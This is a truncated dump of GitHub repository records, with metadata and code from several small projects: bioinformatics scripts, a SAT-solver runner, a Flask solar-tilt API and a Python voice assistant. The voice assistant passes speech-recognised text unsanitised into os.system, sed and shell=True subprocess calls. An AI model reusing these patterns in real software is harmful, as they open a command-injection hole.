mutate(freq = round(n / sum(n)*100,2)) %>% #另一个常见的操作是添加新的列。这就是mutate()函数的工作了。\n mutate(item = paste(n,'(', freq, ')', sep = ''))\n\tcolnames(freq)[2] = indice\n\n#freq\n\tneed = freq[c('Group',indice,'item')]\n#need\n\tdt_cast = dcast(need, eval(parse(text = indice))~Group, value.var='item', fill=0) #太牛批了\n\tcolnames(dt_cast)[1] = indice\n\tdt_cast = dt_cast[c(indice,group_list)]\n#dt_cast\n\twrite.table(dt_cast, file = paste(indice, \"information.xls\", sep = \"_\"),sep=\"\\t\",quote = F, row.names = F)\n\n#计算 P 值\n\tctable = table(sub_dt)\n\n\tif (any(ctable < 5)){\n \tp = fisher.test(ctable, simulate.p.value = TRUE, B = 1e6)$p.value\n\t line = paste(indice, p, 'fisher', sep ='\\t')\n\t writeLines(line, fileConn)\n\t} else {\n \tp = chisq.test(ctable)$p.value\n \tline = paste(indice, p,'chisq', sep ='\\t')\n\t\tprint(indice)\n \twriteLines(line, fileConn)\n }\n}\nclose(fileConn)\n"
},
{
"alpha_fraction": 0.7838827967643738,
"alphanum_fraction": 0.791208803653717,
"avg_line_length": 67.25,
"blob_id": "8631333b858dd5a89f7fb85f590756b5b7167ad1",
"content_id": "00ab3a21447171d07258fb8705e9321a79abecdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 4,
"path": "/Maaslin/maaslin.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /bin/bash\nRscript tsvGeneration.R diff_NCA_AMI_speciesProfileTable.xls phenotype.update.xls Group:Gender:Age NCA:AMI NCA_AMI ./\npython3 config_generate.py NCA_AMI_Group_Gender_Age.tsv 4\nRscript maaslin_run.R -i NCA_AMI_Group_Gender_Age.tsv -c generated_config -o outdir\n"
},
{
"alpha_fraction": 0.6902030110359192,
"alphanum_fraction": 0.6946160793304443,
"avg_line_length": 52.9523811340332,
"blob_id": "a10236d63386a94083635bcf32d2ff6fe3844d4e",
"content_id": "5601bcacfc0a936d3f03ff41440663235a3f1881",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1287,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 21,
"path": "/SplitbyRownames.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import pandas as pd\ndt = pd.read_table('braycurtis.txt', index_col=0)\nexpose_diversity = dt.loc[dt.index.str.contains('-a') == False, dt.columns.str.contains('-a') == False] #这个用法比较巧妙,行名不包含'-a'的行;\nrecovery_diversity = dt.loc[dt.index.str.contains('-a'), dt.columns.str.contains('-a')] # 行名包含 '-a' 的行;\nexpose_diversity.to_csv('expose_diversity', sep='\\t')\nrecovery_diversity.to_csv('recovery_diversity', sep='\\t')\n\n#补充用法,增加单独筛选行或者列的用法,一旦不用就老是忘记....\ndt = pd.read_table('genusProfileTable.xls', header = 0, index_col = 0, sep=\"\\t\")\nexpose_dt = dt.loc[:,dt.columns.str.contains('-a') == False]\nrecovery_dt = dt.loc[:,dt.columns.str.contains('-a')] #注意冒号的使用,代表全部!\nexpose_dt.to_csv('expose_genusProfileTable.xls', sep='\\t')\nrecovery_dt.to_csv('recovery_genusProfileTable.xls', sep='\\t')\n\n#增加通过正则表达式的筛选\nimport pandas as pd\ndt = pd.read_table('expose_genusProfileTable.xls', header=0, index_col=0)\ndt_F = dt.loc[:, dt.columns.str.contains('M\\d',regex=True) == False]\ndt_F.to_csv('expose_F_genusProfileTable.xls', sep=\"\\t\")\ndt_M = dt.loc[:, dt.columns.str.contains('M\\d',regex=True)]\ndt_M.to_csv('expose_M_genusProfileTable.xls', sep=\"\\t\")\n"
}
] | 90 |
lilac/minisat | https://github.com/lilac/minisat | 16889b5e7b59e720ac5c12c345ade5c667ecc78a | 46614a9c0e98ad2bf4c859c1ef97aa79ed08849a | fb34b3a53cc5f438eebc220cb364e0e6f8bdd7e9 | refs/heads/master | 2020-12-25T04:38:48.521474 | 2012-04-30T01:56:58 | 2012-04-30T01:56:58 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.544708788394928,
"alphanum_fraction": 0.5499042868614197,
"avg_line_length": 39.17582321166992,
"blob_id": "dda965eb7d1d07f59f66033b51f62abe4a0d63c1",
"content_id": "ecf7457a8488a5fb6402bf485b09017ebdc2b48c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3657,
"license_type": "permissive",
"max_line_length": 306,
"num_lines": 91,
"path": "/run-solver.py",
"repo_name": "lilac/minisat",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n\nimport sys\n\ndef usage():\n print 'usage: solver directory'\n print 'options: -h, -e extension, -p prefix_name, -t timeout, -m memout, -f (force log removal) -n'\n\nif len( sys.argv ) < 2 :\n usage()\n sys.exit(0)\n\nimport os, glob, getopt, shutil\n\nextension = '.cnf'\njob_name_prefix = ''\ntimeout = '1800'\nmemout = '4G'\nremovedir = False\nresources = ' -V '#-pe smp 4 '\n#resources = ' -V -pe smp 4 '\ngrow = None\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"he:p:t:m:f:g:\", [\"help\", \"extension\", \"prefix\", \"timeout\", \"memout\", \"force\", \"grow\"])\nexcept getopt.GetoptError, err:\n print str(err) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\nfor o, a in opts:\n if o in (\"-e\", \"--extension\"):\n extension = a\n elif o in (\"-p\", \"--prefix\"):\n job_name_prefix = a\n elif o in (\"-t\", \"--timeout\"):\n timeout = a\n elif o in ( \"-m\", \"--memout\" ):\n memout = a\n elif o in (\"-f\", \"--force\"):\n removedir = True\n elif o in (\"-g\", \"--grow\"):\n grow = a\n elif o in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n else:\n assert False, \"unhandled option\"\n\nsolver = os.path.abspath( args[0] )\ndirectory = os.path.expanduser( args[1] )\nif not directory.endswith('/'):\n directory += '/'\nlog_dir = os.path.expanduser( os.getcwd() + '/log/' ) + job_name_prefix + os.path.basename( solver ) + '.' + directory.split('/')[-2]\n\nif grow is not None:\n solver += ' -grow=' + grow\n log_dir += '.' + grow\nprint 'Current parameters:\\n' + 'Solver: ' + solver + \"\\nDirectori: \" + directory + \"\\nExtension: \" + extension + \"\\nJob Prefix: \" + job_name_prefix + \"\\nLog dir: \" + log_dir + \"\\nMemory out: \" + memout + \"\\nTime out: \" + timeout\n\nif removedir :\n shutil.rmtree( log_dir )\n\n#if os.path.isdir( log_dir ):\n# print 'Error: Log directory already exists'\n# print 'It can be removed it with: rm -R ' + log_dir\n# sys.exit(0)\n\nfiles = glob.glob( directory + \"/*\" + extension )\nif len( files ) == 0:\n print 'Error: no files'\n sys.exit(0)\n\nif not os.path.isdir (log_dir):\n os.makedirs( log_dir )\n \nfor file in glob.glob( directory + \"/*\" + extension ):\n file_basename = os.path.basename( file )\n log = log_dir + '/' + file_basename + '.log'\n cmd = ('timelimit -p -s 2 -t ' + timeout + ' ' + solver + ' ' + file + '>' + log)\n print(cmd + '\\n')\n #import pdb; pdb.set_trace()\n if not os.path.exists(log):\n print('log file not exist.\\n')\n os.system(cmd)\n #print ('echo /usr/bin/time -p ' + solver + ' ' + file + ' | qsub ' + resources + ' -cwd -o ' + log_dir + '/' + file_basename + '.log -j y -n ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #break\n #os.system('echo /usr/bin/time -p ' + solver + ' ' + file + ' | qsub ' + resources + ' -cwd -o ' + log_dir + '/' + file_basename + '.log -j y -n ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #os.system('echo /usr/bin/time -p ' + solver + ' ' + file + \" | qsub \" + resources + \" -l h_cpu=\" + timeout + \" -l h_vmem=\" + memout + \" -l mem=\" + memout + \" -o \" + log_dir + '/' + file_basename + '.log -j y -N ' + job_name_prefix + os.path.basename( solver ) + '.' 
+ file_basename + ' > /dev/null ')\n #cmd = ('echo /usr/bin/time -p ' + solver + ' ' + file + \" | qsub \" + resources + \" -l cput=\" + timeout + \" -l vmem=\" + memout + \" -l mem=\" + memout + \" -o \" + log_dir + '/' + file_basename + '.log -j oe -N ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #print cmd\n #os.system(cmd)\n\n"
},
{
"alpha_fraction": 0.4577181339263916,
"alphanum_fraction": 0.4684563875198364,
"avg_line_length": 21.923076629638672,
"blob_id": "17cf4e40f67050fab83a99d97cb59cc7a9639a10",
"content_id": "dfaa020d56b6ebebcc9af24f4072ef9dd292936d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1490,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 65,
"path": "/get-stats.py",
"repo_name": "lilac/minisat",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport re\n\nexps = [\n ('nVar', 'Number of variables:\\\\s*(\\\\d+)'),\n ('nCls', r'Number of clauses:\\s*(\\d+)'),\n ('time', r'CPU time\\s*:\\s*(?P<time>[\\d|\\.]+)')\n ]\n\nREs = [(n, re.compile(e)) for (n, e) in exps]\n\ndef parse(fn):\n res = {}\n with open(fn, 'r') as log:\n for line in log:\n for (n, re) in REs:\n m = re.search(line)\n if m:\n res[n] = m.group(1)\n res['ans'] = line.strip()\n return res\n\ndef sort_dict(a):\n return sorted(a.items(), key = lambda x: x[0])\n\ndef print_stat(info, stat):\n print('*** ' + info + ' ***')\n import pprint\n #pp = pprint.PrettyPrinter(indent=4)\n \n pprint.pprint(stat)\n print('\\n')\n\ndirs = ['jarvisalo', 'UUF250']\ngrows = ['0', '100', '1000']\n\nimport sys\nimport os, glob\n\nstats = {}\ncmp = {}\nfor d in dirs:\n cmp[d] = {}\n stats[d] = {}\n for g in grows:\n ext = '' if g == '0' else '.' + g\n dir = 'log/minisat.' + d + ext\n \n stats[d][g] = {}\n \n for file in glob.glob(dir + \"/*.log\"):\n basename = os.path.basename(file)\n stats[d][g][basename] = parse(file)\n\n if basename not in cmp[d].keys():\n cmp[d][basename] = {}\n cmp[d][basename][g] = stats[d][g][basename]['time']\n\n #stat = sort_dict(stats[d][g])\n #print_stat(dir, stat)\n\n print_stat(d, cmp[d])\n\n#print (stats)\n#print (parse(sys.argv[1]))\n"
}
] | 2 |
mateus-n00b/projeto_alfred | https://github.com/mateus-n00b/projeto_alfred | 3fe9546bbdfb70f144dc826f99bf47029172bdfc | 6da96bccd2e681903217b21109a509c1bc633d77 | 0192bf4ff1019a6133e8b99babf5799c8508bbbb | refs/heads/master | 2021-01-12T07:09:20.909710 | 2017-02-19T23:03:23 | 2017-02-19T23:03:23 | 76,919,538 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5367187261581421,
"alphanum_fraction": 0.5531250238418579,
"avg_line_length": 24.098039627075195,
"blob_id": "15d3d7387bd40a87c55a591380fe29904e7f7ead",
"content_id": "99b86ea95188b7107b3d232a28421fb0fdfb97bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 51,
"path": "/fala.py",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding: UTF-8\n\n\nimport pyttsx,os\nimport speech_recognition as sr\nimport time,sys\n\nengine = pyttsx.init()\n# GAMBIS\nhour = time.asctime().split(' ')[3].split(':')[0]\n\ndef speak(text):\n engine.say(text)\n engine.runAndWait()\n\nif int(hour) < 12:\n speak('Good morning, Mr. '+os.getenv(\"USER\"))\nelif int(hour) >= 12 and int(hour) < 18:\n speak('Good aftermoon, Mr. '+os.getenv(\"USER\"))\nelif int(hour) >= 18 and int(hour) < 23 :\n speak('Good night, Mr. '+os.getenv(\"USER\"))\n\ndef readABook(book):\n fala = pyttsx.init()\n a = open(book, 'r')\n for x in a.readlines():\n fala.say(x)\n time.sleep(0.3)\n sys.exit()\n\ndef checkSystem():\n fala = pyttsx.init()\n # os.system('bash check.sh')\n try:\n a = open(\"/tmp/outLogs\", 'r')\n for x in a.readlines():\n fala.say(x)\n time.sleep(0.3)\n # sys.exit()\n engine.runAndWait() \n except:\n speak(\"Arggg, something goes wrong!\")\n\ndef addCommand(cmd):\n # Ugly command to add commands\n # os.system('sed -i \"s/#,/,\\'%s\\':\\'%s\\'\\\\n#,/\" commands.py' % (cmd.split(':')[0],cmd.split(':')[1]))\n os.system('sed -i \"s/#,/,\\'%s\\':\\'%s\\'\\\\n#,/\" commands.py' % (cmd[0],cmd[1]))\n\n# readABook(\"/tmp/outLogs\")\ncheckSystem()\n"
},
{
"alpha_fraction": 0.47020724415779114,
"alphanum_fraction": 0.48704662919044495,
"avg_line_length": 23.125,
"blob_id": "f868088e5f797577ce3b6b7b2d477882dbfc2a6d",
"content_id": "41d6afaea59faa1f652e43878f3968c3c3e6ca8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 32,
"path": "/commands.py",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#coding: UTF-8\n# Commands for the alfred.py program\n# Do not remove the 'hashtag,' signal\n#\n# Mateus-n00b, Dezembro 2016\n#\n# Version 1.0\n# Licence GPL\n# -==============================================\nclass Commands():\n \"\"\"Here you'll put a list of your commands.\"\"\"\n def __init__(self):\n self = None\n def getCommand(self):\n # Add your commands in the dict\n # {howToCallIt:command}\n return {'firefox': 'firefox &',\n 'music':'totem &',\n\t\t 'metallica':'totem ~/Música/Metallica\\ \\(Black\\ Album\\)\\ -\\ 1991/ &'\n ,'clear':'clear',\n 'code':'atom',\n 'memory':'df -h'\n,'cd':'cd'\n#,\n }\n\n\n\n# Debug\n# a = Commands()\n# dic = a.getCommand()\n# print dic['firefox']\n"
},
{
"alpha_fraction": 0.47164949774742126,
"alphanum_fraction": 0.4974226951599121,
"avg_line_length": 24.866666793823242,
"blob_id": "097cf531e7bf986db5ac783bc559784c95c74332",
"content_id": "e542517cd4e960a155cf21108e7f5924f6b35d27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 15,
"path": "/check.sh",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# script para a verificacao de uso de memoria pelos diretorios\n#\n# Mateus-n00b, Dezembro 2016\n#\n# Versao 1.0\n#\n# Licensa GPL\n# -===================================================================================== -\nrm /tmp/outLogs 2> /dev/null\n\nfor x in \"$HOME/\"*\ndo\n echo \"Total memory usage of $(basename \"$x\") is at $(du -sh \"$x\"| awk '{print $1}')\" >> /tmp/outLogs\ndone\n"
},
{
"alpha_fraction": 0.5528942346572876,
"alphanum_fraction": 0.5584830045700073,
"avg_line_length": 27.146066665649414,
"blob_id": "9c81c3e69e4be086e9a23d526be1da536f8042ac",
"content_id": "a3047cc62e751a220fae390d664feaa5a2a80ff8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2505,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 89,
"path": "/alfred.py",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# Simples script para execucao de comandos de voz\n# O codigo foi baseado no exemplo presente em\n# https://pythonspot.com/en/speech-recognition-using-google-speech-api/\n#\n# Mateus-n00b, Dezembro 2016\n#\n# Versao 1.0\n#\n# Licensa GPL\n# -================================================================-\n\nimport speech_recognition as sr\nimport pyttsx,os\nfrom subprocess import Popen, PIPE\nimport commands,time\nimport pyaudio\n\n\n# To speak\nengine = pyttsx.init()\n# Record Audio\nr = sr.Recognizer()\n# Audio var\nglobal audio\n\n# +==============================+\n# FUNCTIONS\n# +==============================+\ndef speak(text):\n engine.say(text)\n engine.runAndWait()\n\ndef addCommand(cmd):\n os.system('sed -i \"s/#,/,\\'%s\\':\\'%s\\'\\\\n#,/\" commands.py' % (cmd[0],cmd[1]))\n\ndef listen():\n with sr.Microphone() as source:\n speak(\"I'm ready to help you\")\n print \"I'm ready to help you\"\n audio = r.listen(source)\n return str(r.recognize_google(audio)).lower()\n# +==============================+\n# MAIN\n# +==============================+\ntry:\n with sr.Microphone() as source:\n speak(\"What do you need sir?\")\n print \"What do you need sir?\"\n audio = r.listen(source)\n\nexcept Exception as e:\n speak(\"Arggg, something goes wrong!\")\n raise e\n\n# Speech recognition using Google Speech Recognition\ntry:\n # Get the commands from the commands.py\n cmds = commands.Commands().getCommand()\n for x in cmds.keys():\n if x in str(r.recognize_google(audio)).lower():\n os.system(cmds[x])\n speak(\"Executing %s\" % (x))\n break\n\n elif 'addiction' in str(r.recognize_google(audio)).lower():\n print (\"What is the nick of the command?\")\n nick = listen()\n print (\"What is the command?\")\n cmd = listen()\n\n tp = (nick,cmd)\n addCommand(tp)\n\n elif 'search' in str(r.recognize_google(audio)).lower():\n search = listen()\n cmd = Popen([\"bash engine.sh {0}\".format(search)], stdout=PIPE, shell=True)\n saida, erro = cmd.communicate()\n speak(\"Showing the results\")\n print saida,erro\n\n else:\n print (\"You said \"+r.recognize_google(audio))\n\nexcept sr.UnknownValueError:\n print (\"What do you said?\")\nexcept sr.RequestError as e:\n print \"Could not request results from Google Speech Recognition service; {0}\".format(e)\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.7770780920982361,
"alphanum_fraction": 0.7808564305305481,
"avg_line_length": 33.4782600402832,
"blob_id": "6d1a468277fe74c521cf23fa92f9c6dca31f4b3a",
"content_id": "6f97ebab3a7223ccd37c35ece2e2f275db29114e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 23,
"path": "/README.md",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "# projeto_alfred\nEste programa utiliza a API da Google (Google Speech API) para reconhecimento de voz. \nEsta API permite transformar comandos de voz em strings, que por sua vez podem ser comandos\na serem executados na sua maquina. \n\n## Dependencias\nPara instalar a API acesse:\nhttps://pythonspot.com/en/speech-recognition-using-google-speech-api/\n\nO PyAudio deve ser instalado da seguinte forma:\n**sudo apt-get install python3-pyaudio**\n\nPara instalar o pyttsx (para a fala) execute o comando:\n**sudo pip install pyttsx**\n\n## Testado nas distribuilcoes\n**Debian Jessie**\n\n## Como usar\nNo arquivo commands.py estao localizados os comandos que o usuario deve definir. \nEstao organizados da seguinte forma {NickDoComando:Comando}. \n\nSinta-se livre para elogiar, contribuir ou criticar. n00b º_º. \n"
},
{
"alpha_fraction": 0.5419355034828186,
"alphanum_fraction": 0.5612903237342834,
"avg_line_length": 24.83333396911621,
"blob_id": "b5e1d12bc62bd35bf2d224fa5689e5cf97927943",
"content_id": "46ae87990118e6fbde4252dabcac67fe72836342",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 6,
"path": "/engine.sh",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n[ $# -lt 1 ] && exit\necho \"Found items\"\nlocate \"$1\" | while read res; do\n echo \"$res is from type $(file $res | awk -F: '{print $2}')\"\ndone\n"
}
] | 6 |
SalmanSayeed79/solaris-backend | https://github.com/SalmanSayeed79/solaris-backend | 322b327ead9a1b0d7b7b9448f3ba548e873c7ace | a86144206fa01ad9844e9904585fdfd717a73588 | e6edc9dde683cd483e49803bcb05b07241e98b6d | refs/heads/master | 2023-08-04T01:58:05.549647 | 2021-10-02T10:27:08 | 2021-10-02T10:27:08 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7474324703216553,
"alphanum_fraction": 0.7577025294303894,
"avg_line_length": 56.130435943603516,
"blob_id": "23cbaf1ee303cc04de15d230d1096d5f9266d87c",
"content_id": "ed76b03843e2e38bb4800d1c4111c172c6539192",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2629,
"license_type": "no_license",
"max_line_length": 277,
"num_lines": 46,
"path": "/README.md",
"repo_name": "SalmanSayeed79/solaris-backend",
"src_encoding": "UTF-8",
"text": "\n# Solaris Backend\n[](https://postimg.cc/QKGHpX5B)\nThe core of the \"Solaris\" web app and the mobile app is its backend REST API. This is where the fetching of data occurs. And our calculation for optimal tilt angle is also done here\n\nYou can view are web app [here](https://solaris-bd.web.app/)\n\n\n### Challenges\n---\nWhile building the web app for \"Solaris\", we encountered two huge problems : \n - #### CORS error while fetching data\n\t Fetching data directly from POWER API causes CORS(Cross Origin Resource Sharing) error. This is error is resolved in our backend using the CORS module for flask\n - #### Calculation of the optimal tilt angle\n\t One of the key features of \"Solaris\" is to provide the optimal tilt angle for solar panels. All the calculations for that are done in our backend.\n\n### Dependencies\n---\nWe have used a few modules to build up our backend REST API. They are listed below:\n1. Python Flask\n2. flask_cors from CORS\n3. json module\n4. requests module\n5. math module\n6. requests module\n### Endpoints\n---\nThere are basically 3 basic endpoints of this REST API \n\n1. ```/api/temporal/daily/optimum```\n\tThis endpoint returns the estimated power output, optimal tilt angle, optimal power output etc. This is a part of our unique API which makes use of our exquisite algorithm to calculate the optimal tilt angle and returns it to the client\n2. ```/api/temporal/monthly/point/params``` \n\tThis endpoint return the monthly data of a certain location at a certain time. This actually fetches data from NASA POWER API and routes it back to the client\n3. ```/api/temporal/daily/point```\n\tThis endpoint deals with the daily data of a particular location at a particular day. The param list contains all the information about latitude, longitude, starting date, ending date, return type. This endpoint also fetches data from NASA POWER API and feeds it to the client\n### Resources\n---\n* Solaris web app : [Solaris web homepage](https://solaris-bd.web.app/)\n* Solaris web app repo : [Github repo for Solaris web app](https://github.com/SalmanSayeed79/Solaris-BD)\n* Solaris Mobile app : [Apk drive link](https://drive.google.com/file/d/170HMrigXFpZwzHW3F4FIAJt-gC9HfU5Z/view?usp=sharing)\n* Solaris Mobile app repo: [Github repo for solaris mobile app](https://github.com/zarifikram/SOLARIS)\n* Solaris IOT module : [Github repo for Solaris IOT code](https://github.com/pptx704/solaris-servo-control)\n\n### Reference\n---\nNASA POWER API Homepage : [NASA POWER API](https://power.larc.nasa.gov/)\nPython Flask : [Flask Website](https://flask.palletsprojects.com/en/2.0.x/)\n"
},
{
"alpha_fraction": 0.6761869192123413,
"alphanum_fraction": 0.6928783655166626,
"avg_line_length": 38.661766052246094,
"blob_id": "e7a7d6d5b2d875dd848d72f13b5f5d0f6a0168db",
"content_id": "5e43d94a0657acb3c94705f56b37720014a15045",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2696,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 68,
"path": "/plan.py",
"repo_name": "SalmanSayeed79/solaris-backend",
"src_encoding": "UTF-8",
"text": "#AKA elevation angle\nimport json\nimport requests\nfrom math import sin, cos, exp\nfrom datetime import datetime\ndef get_api(longitude, latitude):\n now = datetime.now()\n timeline = f\"{now.year-1}{now.month}{now.day}\"\n parameters = {\n 'parameters': \"ALLSKY_SFC_SW_DWN,CLRSKY_SFC_SW_DWN,ALLSKY_KT\",\n 'community': \"RE\",\n 'longitude': longitude,\n 'latitude': latitude,\n 'start': timeline,\n 'end': timeline,\n 'format': \"JSON\"\n }\n data = requests.get(\"https://power.larc.nasa.gov/api/temporal/daily/point\", params=parameters)\n return data.json()\n\ndef get_location(data):\n longitude = data['geometry']['coordinates'][0]\n latitude = data['geometry']['coordinates'][1]\n return (latitude, longitude)\n\ndef getSolarZenithAngle(data, noOfDay = datetime.now().timetuple().tm_yday):\n latitude, longitude = get_location(data)\n declinationAngle = 23.45*sin(360*( 284 + noOfDay) / 365 )\n return 90 - latitude + declinationAngle\n\n#if this value is < 0.3 we say it's overcast\ndef getModifiedClearnessIndex(clearnessIndex, solarZenithAngle):\n return solarZenithAngle / (.1 + 1.031*exp(-1.4/(.9 + 9.4*cos(solarZenithAngle))))\n \ndef getOptimumPowerPerSqMeter(data):\n clearnessIndex = list(data[\"properties\"][\"parameter\"][\"ALLSKY_KT\"].values())[0]\n solarZenithAngle = getSolarZenithAngle(data)\n if getModifiedClearnessIndex(clearnessIndex, solarZenithAngle) < 0.3:\n return getDiffuseIrradiation(data)\n else:\n return getGlobalIrradiation(data) / sin(solarZenithAngle)\n \ndef getOptimumTiltAngle(data):\n clearnessIndex = list(data[\"properties\"][\"parameter\"][\"ALLSKY_KT\"].values())[0]\n solarZenithAngle = getSolarZenithAngle(data)\n \n if getModifiedClearnessIndex(clearnessIndex, solarZenithAngle) < 0.3:\n return 0\n else: \n return 90 - solarZenithAngle\n \ndef getDiffuseIrradiation(data):\n allsky = list(data[\"properties\"][\"parameter\"][\"ALLSKY_SFC_SW_DWN\"].values())[0]\n clrsky = list(data[\"properties\"][\"parameter\"][\"CLRSKY_SFC_SW_DWN\"].values())[0]\n return float(clrsky) - float(allsky)\n\n \ndef getGlobalIrradiation(data):\n allsky = list(data[\"properties\"][\"parameter\"][\"ALLSKY_SFC_SW_DWN\"].values())[0]\n return allsky\n \ndef getRegularPowerPerSqMeter(data):\n latitude, longitude = get_location(data)\n solarZenithAngle = getSolarZenithAngle(data)\n return abs((getGlobalIrradiation(data) - getDiffuseIrradiation(data)) * sin(latitude + solarZenithAngle) / sin(solarZenithAngle))\n \ndef getPercentProfit(data):\n return (getOptimumPowerPerSqMeter(data) - abs(getRegularPowerPerSqMeter(data))) * 100 / abs(getRegularPowerPerSqMeter(data))"
},
{
"alpha_fraction": 0.6502347588539124,
"alphanum_fraction": 0.6502347588539124,
"avg_line_length": 29,
"blob_id": "c68d8436de9b2fdbe3e2b6bd7438967b25cc87aa",
"content_id": "60a402f6be85a81e659b5e221c7b0eb426a4eeec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2130,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 71,
"path": "/app.py",
"repo_name": "SalmanSayeed79/solaris-backend",
"src_encoding": "UTF-8",
"text": "import json\nfrom plan import (\n get_api, \n getOptimumTiltAngle, \n getOptimumPowerPerSqMeter, \n getRegularPowerPerSqMeter, \n getPercentProfit\n)\nimport requests\nfrom flask import Flask, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\[email protected]('/api/temporal/monthly/point')\ndef monthly():\n parameters = request.args.get('parameters')\n community = request.args.get('community')\n longitude = request.args.get('longitude')\n latitude = request.args.get('latitude')\n format = request.args.get('format')\n start= request.args.get('start')\n end = request.args.get('end')\n\n query = {\n 'parameters': parameters,\n 'community': community,\n 'longitude': longitude,\n 'latitude': latitude,\n 'format': format,\n 'start': start,\n 'end': end\n }\n response = requests.get(\"https://power.larc.nasa.gov/api/temporal/monthly/point\", params=query)\n return response.json()\n\[email protected]('/api/temporal/daily/point')\ndef dailyData():\n parameters = request.args.get('parameters')\n community = request.args.get('community')\n longitude = request.args.get('longitude')\n latitude = request.args.get('latitude')\n format = request.args.get('format')\n start= request.args.get('start')\n end = request.args.get('end')\n\n query = {\n 'parameters': parameters,\n 'community': community,\n 'longitude': longitude,\n 'latitude': latitude,\n 'format': format,\n 'start': start,\n 'end': end\n }\n response = requests.get(\"https://power.larc.nasa.gov/api/temporal/daily/point\", params=query)\n return response.json()\n\[email protected]('/api/temporal/daily/optimum')\ndef daily():\n longitude = request.args.get('longitude')\n latitude = request.args.get('latitude')\n data = get_api(longitude, latitude)\n api = {\n \"optimum_tilt_angle\": getOptimumTiltAngle(data),\n \"optimum_power_per_sqmeter\": getOptimumPowerPerSqMeter(data),\n \"regular_power_per_sqmeter\": getRegularPowerPerSqMeter(data),\n \"profit_percentage\": getPercentProfit(data)\n }\n return api\n"
}
] | 3 |
den200x/side_scripts | https://github.com/den200x/side_scripts | 5454393e942411087430d98fa5e6d957cf3e9801 | 6ef6b341b30449d43d1c424b25b8c42cfaa54cd9 | 2fa6c74170e0a1fc28316f3cfe0bb675d7e0db40 | refs/heads/master | 2020-03-28T14:45:16.482693 | 2018-09-12T17:51:43 | 2018-09-12T17:51:43 | 148,519,395 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.631393313407898,
"alphanum_fraction": 0.654321014881134,
"avg_line_length": 13.921052932739258,
"blob_id": "4fc52e24841f0248cc40bc649ac2afe04399c77f",
"content_id": "7da41ecd2b40f960eab26516064e0d152dc0e1da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 38,
"path": "/datetimeConverter.py",
"repo_name": "den200x/side_scripts",
"src_encoding": "UTF-8",
"text": "import datetime\nimport time\nimport threading\n\nprint('starting')\n\ndef startTime():\n return datetime.datetime.now()\ntl=[]\ndef datetimeConverter():\n startTimestring = str(startTime())\n startTimelist = startTimestring.split()\n tS = list(map(float,startTimelist[1].split(':')))\n csT= tS[0]*3600+tS[1]*60+tS[2]\n tl.append(csT)\n\n print(tl)\n print(csT)\n return\n\n\n\ndef ProcessingTime():\n datetimeConverter()\n tdc = tl[1]-tl[0]\n print(tdc)\n del tl[:]\n return\n\n\nprint(tl)\n\ndatetimeConverter()\n\ntime.sleep(3)\n\nProcessingTime()\nprint(tl)\n"
},
{
"alpha_fraction": 0.5950652956962585,
"alphanum_fraction": 0.6110304594039917,
